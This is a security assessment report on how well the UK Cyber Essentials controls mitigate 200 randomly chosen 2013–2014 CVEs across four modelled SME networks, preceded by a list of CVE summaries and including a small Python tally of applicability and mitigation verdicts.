CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Executive Summary

Findings

This report assesses the Cyber Essentials controls' effectiveness in mitigating cyber-threats.

Two-hundred randomly selected internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security-practice.
The aggregated results show that without the Cyber Essentials controls, none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.

With the CE tools, more than 99% of the vulnerabilities in SMEs interviewed were mitigated, as shown in the figure below, which depicts the aggregated results across all cases studied. The approx. 13% of exploits only partially mitigated rely on hardware or software vendors to release patches promptly and effectively to combat any vulnerabilities.

Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. However, up until a patch is released there remains a vulnerability in the network. For this reason it should be stressed that SMEs should frequently consider what services or software is installed, whether it is necessary, and whether a more secure alternative is available.

The few vulnerabilities not mitigated by Cyber Essentials are as such because of fundamental hard-coded flaws in hardware or software that are unable to be updated or patched to a secure state.
Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials tools have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework)[10] viable for a remote attack have been considered.

The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks; it may be recommended that a follow-up study with a wider scope be carried out to investigate the risks from other forms of attack with the use of Cyber Essentials.

The '10 Steps to Cyber Security' report published by CESG[2] highlights that in order to maximise the security of a network it is essential to not only consider the prevention of attacks with the use of tools, but to also ensure that all employees are adequately educated in network security and treated with scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.

For hardware or software identified as inherently flawed, resulting in unmitigatable vulnerabilities, our recommendation is that these pieces of software or hardware be avoided at all costs when developing an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation of integrating Cyber Essentials further with collective security approaches such as the Cyber-security Information Sharing Partnership (CiSP)[4]. These approaches keep SMEs up to date with the latest information about vulnerabilities and other cyber-threat information.
Introduction

Cyber Essentials was introduced as a government-funded scheme, first published in April 2014, in the interest of national security to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to utilize for the mitigation of the 'bottom 80%' of remote cyber-threats[3].

The scheme, built to provide an implementable form of the 10 Steps to Cyber Security[1], was released as part of the 2011 UK Cyber Security Strategy[16] and is being backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays[5].

The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services"[17].
The Cyber Essentials security controls are summarised as follows[7]:

Firewalls and Gateways: These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, either in hardware or software form, is important for them to be fully effective.

Secure configuration: Ensuring that systems are configured in the most secure way for the needs of the organisation.

Access control: Ensuring only those who should have access to systems have access, and at the appropriate level.

Malware protection: Ensuring that virus and malware protection is installed and is up to date.

Patch management: Ensuring the latest supported version of applications is used and all the necessary patches supplied by the vendor have been applied.
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered as applicable to all sizes of enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in its inclusion of 'Bring your own Device' network setups in scope, as well as Cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as in manufacturing and retail, are applicable to CE but hold additional vulnerabilities due to their nature that are not to be considered.
Aims
The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.

A commodity-level attack has been defined by CESG[8] as:

    Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct.¹

To effectively assess Cyber Essentials it is firstly necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results will help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of SMEs interviewed.

The networks modelled from collected data are to be considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted with the adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.
Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper-models to be analysed.

• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can exploit commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.
Data Collection
In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.
Interviews
The interviews were composed with the goal of firstly understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration it was important to understand how the network is used - where remote connections take place, how local services are utilised and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches and how often updates are rolled out.
Survey
The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME to gauge its size, the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9] and another publicly to closed groups of security-interested SME representatives.
Vulnerabilities
A total of 200 random vulnerabilities have been taken in equal numbers from two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre.² Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre organisation's definition of a vulnerability, which they state as:

    An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page[6] in March '15.)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3 Methodology for Assessing Cyber Essentials
To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed as to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.
Mitigation Assessment
The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use, or likely in use (based on the SME's practice), are deemed applicable to the network.
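The applicability rule and the three-way verdict described above can be turned into a small, repeatable tally. The following is an added illustration, not code from the report: the CVE records, the inventory, the placeholder CVE ids and the verdicts are constructed sample data rather than the report's 200-CVE dataset, and each verdict is an input because in the report it is a human, double-vetted judgement rather than something computed.

```python
"""Applicability and mitigation tally for a CVE list against an SME inventory.

Added illustration of the assessment procedure; not code from the report.
All records below are constructed sample data.
"""
from collections import Counter
from dataclasses import dataclass, field

MITIGATED = "mitigated"
PARTIAL = "partially mitigated"
NOT_MITIGATED = "not mitigated"


@dataclass(frozen=True)
class Cve:
    cve_id: str     # placeholder ids below, not real CVE numbers
    kind: str       # "hardware" or "software"
    vendor: str
    product: str
    verdict: str    # outcome of the double-vetted assessment with the CE controls


@dataclass
class Inventory:
    """What one SME network runs, as gathered in interview."""
    hardware_vendors: set = field(default_factory=set)
    software_in_use: set = field(default_factory=set)
    software_likely: set = field(default_factory=set)  # likely in use, judged from the SME's practice


def applicable(cve: Cve, inv: Inventory) -> bool:
    """Applicability rule: a hardware CVE applies if the network uses a like-product
    from the same vendor; a software CVE applies only if the product is in use or
    likely in use."""
    if cve.kind == "hardware":
        return cve.vendor in inv.hardware_vendors
    return cve.product in inv.software_in_use or cve.product in inv.software_likely


def tally(cves, inv=None):
    """Count verdicts over the applicable CVEs. With inv=None every CVE counts,
    which is the worst-case 'everything is in use' view of the full list."""
    counts = Counter({MITIGATED: 0, PARTIAL: 0, NOT_MITIGATED: 0})
    for cve in cves:
        if inv is None or applicable(cve, inv):
            counts[cve.verdict] += 1
    return dict(counts)


def percentages(counts):
    """Express a tally as percentages, rounded to one decimal place."""
    total = sum(counts.values())
    return {k: round(100.0 * v / total, 1) for k, v in counts.items()} if total else {}


# Constructed sample list (ids and vendors are placeholders).
SAMPLE_CVES = [
    Cve("CVE-0000-0001", "software", "VendorA", "BrowserA", MITIGATED),
    Cve("CVE-0000-0002", "software", "VendorB", "PluginB", PARTIAL),
    Cve("CVE-0000-0003", "hardware", "RouterCo", "RC-100 router", NOT_MITIGATED),
    Cve("CVE-0000-0004", "software", "VendorC", "ServerC", MITIGATED),
    Cve("CVE-0000-0005", "hardware", "SwitchCo", "SC-24 switch", MITIGATED),
]

# Constructed inventory: a RouterCo router, BrowserA installed, PluginB likely present.
SAMPLE_INVENTORY = Inventory(
    hardware_vendors={"RouterCo"},
    software_in_use={"BrowserA"},
    software_likely={"PluginB"},
)

if __name__ == "__main__":
    worst_case = tally(SAMPLE_CVES)
    network = tally(SAMPLE_CVES, SAMPLE_INVENTORY)
    print("full list (worst case):", worst_case, percentages(worst_case))
    print("sample network:        ", network, percentages(network))
```

Running the block without an inventory reproduces the "full list" view used in the Analysis section; passing an inventory per interviewed SME gives the per-network applicable counts.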
Analysis

The analysis of data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used in each SME network configuration is included.

The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed as applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated and 8 were not mitigated.

Figure 4 Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are as such because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Despite any level of security tools being deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to quickly respond to security breaches as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary - or if there are more suitable, and potentially more secure, solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate this vulnerability, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In a case such as this, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the found cases this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security stand-point, it can be that no level of security tools on top of the network can aid in mitigation - rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device-blacklist for SMEs.
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilizing an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5 SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site a Windows File Server (SAMBA) server provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides both local HTTP access to the database it runs, as well as having firewall rules put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6 SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.
SME Network Two - Specialist Group
Physical Infrastructure: The second SME participant employs 20-25 people, based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators, via SSH.

Network equipment includes an external Dell PowerEdge Server, four TP-Link Switch Access Points and a TP-Link DHCP Router.

Figure 7 SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.

Some employees use VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8 SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head - in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge Server, one TP-Link Switch Access Point and a TP-Link DHCP Router.

Figure 9 SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows 7 & Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and Cloud Service Access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10 SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers on various versions, to test and build a customer's website, means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web-content.
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router - this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through on-line services including Dropbox and SkyDrive. A standalone web-server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access: User access is not mediated in any way and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12 SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses
